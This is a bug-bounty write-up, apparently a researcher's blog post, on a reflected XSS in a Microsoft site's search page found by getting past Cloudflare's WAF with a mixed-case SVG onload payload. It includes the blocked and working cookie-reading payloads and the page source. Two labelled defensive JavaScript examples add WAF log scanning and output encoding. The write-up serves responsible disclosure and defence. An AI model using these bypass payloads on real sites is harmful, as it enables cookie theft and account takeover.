Cloudflare Bypass leads to RXSS [Reflected Cross-Site Scripting] in Microsoft
Har Har Mahadev 🔱. This is Prince Roy, a security researcher, also known as royzsec, back with another write-up about my latest finding [Cross-Site Scripting] on a Microsoft domain by bypassing Cloudflare. Are you curious about the whole process and my mindset while finding it?
So let’s start! As usual, I use subfinder to collect subdomains, but this time I collected the subdomains from https://chaos.projectdiscovery.io/, where you can easily get updated domains; they update their list every day.
Then, with httpx, I checked and gathered all the live domains:
cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txt
Then I checked every domain one by one. I guess on the fourth or fifth domain I found this vulnerability. Actually, that domain's search functionality was vulnerable. So, as a normal request, I searched for “Hello”.
Then I looked at the page's view-source, because just putting a payload in without knowing how the functionality works will not get you anywhere, and Microsoft domains use Cloudflare and the cdnjs CDN [Content Delivery Network].
Source code of the search function:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>
So here, “Hello” was reflected inside the <h1> tag, and there was no filtering of the search input. Then I tried closing the </h1> and using normal payloads:
</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>
But both times Cloudflare blocked me.
Then I tried my Brahmastra:
FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>
Most of the time, this payload has helped me bypass the WAF or Cloudflare in the past. When I tried it here, guess what!!
Boom!! The code was injected successfully and popped up on the screen. Source code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>
Closing the </h1> is what allowed the injection, and the mix of lower-case and upper-case characters is what helped to bypass the firewall. Literally, I was like
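The bypass above worked because the WAF rule evidently matched the tag and event-handler names case-sensitively. From the defender's side, the lesson is that any rule or log-review script must URL-decode and case-fold the input before matching. The following is an added example, not code from this write-up or from Cloudflare or Microsoft: it scans constructed access-log lines (the log format and the `/search?q=` parameter are assumptions) and flags the same probe whether it arrives as `<script>`, `<Svg OnLoad=` or `<SVG ONLOAD=`.

```javascript
// Added example (not from the write-up): normalise and scan request query
// strings for reflected-XSS probes the way a WAF rule or log-review script
// should, so that mixed-case tags such as "<Svg OnLoad=" are not missed.

// Constructed sample access-log lines (not real traffic, format assumed).
const SAMPLE_LOGS = [
  'GET /search?q=Hello HTTP/1.1 200',
  'GET /search?q=%3C%2Fh1%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1 403',
  'GET /search?q=FUZZ%3C%2Fh1%3E%3CSvg%20Only%3D1%20OnLoad%3Dconfirm(1)%3E HTTP/1.1 200',
  'GET /search?q=svg+icons HTTP/1.1 200',
];

// Decode repeatedly (probes are sometimes double-encoded), then case-fold,
// so that every case variant of a tag collapses to one form.
function normalise(value) {
  let out = value.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let decoded;
    try { decoded = decodeURIComponent(out); } catch { break; }
    if (decoded === out) break;
    out = decoded;
  }
  return out.toLowerCase();
}

// Indicators are applied to the normalised (lower-case) value only.
const XSS_INDICATORS = [
  { name: 'closing-tag-breakout', re: /<\/[a-z][a-z0-9]*\s*>/ },
  { name: 'script-tag',           re: /<script[\s>]/ },
  { name: 'event-handler-attr',   re: /<[a-z][a-z0-9]*[^>]*\son[a-z]+\s*=/ },
];

// Pull the raw query string out of a "METHOD /path?query HTTP/x" log line.
function extractQuery(logLine) {
  const m = logLine.match(/^\S+\s+\S+\?(\S*)\s+HTTP\//);
  return m ? m[1] : '';
}

// Returns the distinct indicator names that fire for one log line.
function scanLogLine(logLine) {
  const hits = [];
  for (const pair of extractQuery(logLine).split('&')) {
    const eq = pair.indexOf('=');
    const value = normalise(eq === -1 ? pair : pair.slice(eq + 1));
    for (const { name, re } of XSS_INDICATORS) {
      if (re.test(value)) hits.push(name);
    }
  }
  return [...new Set(hits)];
}

// Returns only the lines that triggered at least one indicator.
function scanLogs(lines) {
  return lines
    .map(line => ({ line, hits: scanLogLine(line) }))
    .filter(r => r.hits.length > 0);
}

for (const r of scanLogs(SAMPLE_LOGS)) {
  console.log(r.hits.join(','), '<-', r.line);
}
```

Note that the third sample line, the case-mixed `<Svg ... OnLoad=` probe, returned 200 in the constructed log while the plain `<script>` probe returned 403; a scan that flags both regardless of status code is exactly what a detection engineer wants when reviewing WAF coverage, and the benign `svg icons` query is not flagged because no tag delimiter is present.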
I reported it quickly, and the next day the MSRC team accepted it as a valid issue.
They patched it within one day. I tried to bypass it again, but the function is now pretty safe.
Patched code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>
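The root cause visible in the two view-source snippets is that the search term is concatenated raw into both the `aria-label` attribute value and the `<h1>` text node. The patched output above shows the `<`, `>`, `(` and `)` characters gone, but the `"` from the payload still terminates the `aria-label` attribute early, which is why output encoding of every structurally significant character is the standard fix rather than stripping a few of them. The following is an added example, not the page's code and not Microsoft's: it rebuilds the search-header template from the snippets above (the template function and `escapeHtml` are assumptions) and renders the write-up's own payload first unencoded and then HTML-encoded.

```javascript
// Added example (not the page's or Microsoft's code): the same search-header
// markup rendered two ways. renderUnsafe() concatenates the raw query into an
// attribute value and a text node, matching the write-up's first view-source;
// renderSafe() HTML-encodes the query before it reaches either context.

// Minimal HTML entity encoder: every character that can change structure in a
// text node or a double-quoted attribute value becomes an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Template reconstructed from the snippets in the write-up (an assumption).
function searchHeader(term, resultCount) {
  return [
    '<div class="search">',
    '<div class="search-header">',
    `<h1 class="search-header__search-term" aria-label="Search results for ${term}">${term}</h1>`,
    '<span class="search-header__line-break"></span>',
    '<div class="search-header__results-number" id="search-range">' +
      `<span class="sr-text"></span>${resultCount} result</div>`,
    '</div>',
  ].join('\n');
}

// Vulnerable: raw reflection, as in the original page.
function renderUnsafe(query, resultCount) {
  return searchHeader(query, resultCount);
}

// Hardened: the query is entity-encoded before it reaches the template.
function renderSafe(query, resultCount) {
  return searchHeader(escapeHtml(query), resultCount);
}

// Reviewer check on rendered output: the only tag names present should be the
// template's own. Returns any others (lower-cased), e.g. an injected "svg".
const EXPECTED_TAGS = new Set(['div', 'h1', 'span']);
function unexpectedTags(html) {
  const found = new Set();
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!EXPECTED_TAGS.has(tag)) found.add(tag);
  }
  return [...found];
}

// The probe from the write-up, used here as a constructed test input.
const PROBE = 'Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>';

console.log(renderUnsafe(PROBE, 0));
console.log(unexpectedTags(renderUnsafe(PROBE, 0))); // [ 'svg' ]
console.log(renderSafe(PROBE, 0));
console.log(unexpectedTags(renderSafe(PROBE, 0)));   // []
```

`unexpectedTags` lower-cases tag names before comparing, so the mixed-case `<Svg` that slipped past the WAF is still reported in the unsafe rendering; in the safe rendering the term survives as visible text (`&lt;Svg ...`) without becoming markup, and the `aria-label` attribute stays intact because `"` is encoded as `&quot;`.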
Priority: P2
Severity: Important
POC:
Impact:
- As an attacker, I can use this attack to steal the victim's cookie, which leads to ATO [Account Takeover].
- Disclosure of end-user files, redirecting the user to another page or site, or modifying the presentation of content.
Hall Of Fame:
Finally, thanks for reading my small blog. If you liked it, please share it with your friends and press the clap button for me; it inspires me a lot.
Please follow me on my social media platforms:
LinkedIn: https://www.linkedin.com/in/prince-roy-4b9a75187/
GitHub: https://github.com/royzsec
Twitter: https://twitter.com/royzsec